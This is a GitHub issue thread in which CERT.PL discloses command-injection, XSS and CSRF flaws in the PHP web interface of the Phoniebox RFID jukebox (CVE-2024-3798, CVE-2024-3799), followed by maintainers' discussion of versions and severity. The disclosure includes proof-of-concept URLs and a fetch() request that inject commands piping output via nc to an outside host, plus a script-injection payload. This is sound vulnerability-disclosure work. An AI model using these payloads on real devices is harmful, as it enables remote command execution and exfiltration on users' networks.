MiczFlor/RPi-Jukebox-RFID #2342: 🐛 | RCE/CSRF/XSS vulnerabilities

lukigruszka, 2024-04-15:
### Version

3.5.2

### Branch

develop

### OS

Ubuntu 

### Pi model

NA

### What happened?

Hello, 
CERT.PL has found several vulnerabilities while performing a wider scan of open source projects.
Since our [last issue](https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2120) remained open, we've decided to post details here and reserve CVEs to make the discussion easier. We tested the current state of `develop` branch. 

As we focus mainly on finding vulnerabilities, we may not be able to assist you in the process of preparing required fixes and/or validate their quality.

## RCE/XSS/CSRF (CVE-2024-3798)

GET parameter `file` handled by `htdocs/api/playlist/playsinglefile.php` let's you execute commands
POC:
`http://127.0.0.1:8002/RPi-Jukebox-RFID/htdocs/api/playlist/playsinglefile.php?file=%27;ls|nc%20web.kazet.cc%203333%20%23`

Using the same parameter it's possible to exploit XSS vulnerability:
`http://127.0.0.1:8002/RPi-Jukebox-RFID/htdocs/api/playlist/playsinglefile.php?file=%3Cscript%3Ealert(1);%3C/script%3E`

and also CSRF, which results in opening any file an attacker would point to.

## RCE (CVE-2024-3799)
Sending a crafted POST request to `htdocs/inc.setWifi.php` let's you execute commands.

POC:
`fetch("http://127.0.0.1:8002/RPi-Jukebox-RFID/htdocs/inc.setWifi.php", {"headers": {"content-type": "application/x-www-form-urlencoded",},"body": "submitWifi=submit&WIFIssid_ls=lll&WIFIpass_ls=12345678';ls|nc web.kazet.cc 3333; #&WIFIprio_ls=1","method": "POST",}).then((response) => {return response.text();    }).then((data) => {console.log(data);})`

While this file should not be directly accessible from the internet, one may think of a scenario when a Jukebox user visits a site with an included JS script, which would send such a request to multiple hosts on LAN network

Groovylein, 2024-04-15:
@lukigruszka thank you.

Currently we don't have any process in integrating vulnerabilities.

How did you find and catch this project in your process?

lukigruszka, 2024-04-15:
We just searched for popular projects on GH and performed a relatively shallow check on them. 
Surely the scan was not intended to find all possible vulnerabilities, so other ones might exist in this project.

s-martin, 2024-04-16:
@lukigruszka the version of Phoniebox is not correct, it's 2.6

lukigruszka, 2024-04-19:
Thanks @s-martin for correcting the version, I must admit getting a bit confused by the branching strategy ;-)

CERT-PL-CNA, 2024-07-10:
Hello, since details were already disclosed and nobody proved that these vulnerabilities do not exist, we have decided to publish the records. They are available under the links:
[CVE-2024-3798](https://www.cve.org/CVERecord?id=CVE-2024-3798)
[CVE-2024-3799](https://www.cve.org/CVERecord?id=CVE-2024-3799)

s-martin, 2024-07-11:
@CERT-PL-CNA thanks for the info.

You may want to clarify the description of both entries a little.

Newer versions of 3.x branches are **not** affected as the version 3 is a complete rewrite which uses a completely new code base (and no PHP at all).

Personally I also don't think the severity is "high" as the Phoniebox web interface is usually only accessed from a local network.

CERT-PL-CNA, 2024-07-12:
Hi @s-martin. 
you are right about the versions, we have adjusted the entries.

Regarding the CVSS score - as the attack might be performed remotely by serving a malicious website, we opt to leave the factors unchanged. But even if we changed the vector from `Remote` to `Local`, then we would also have to switch the required `User Interaction` to `None` and the overall score would decrease by only 0.1.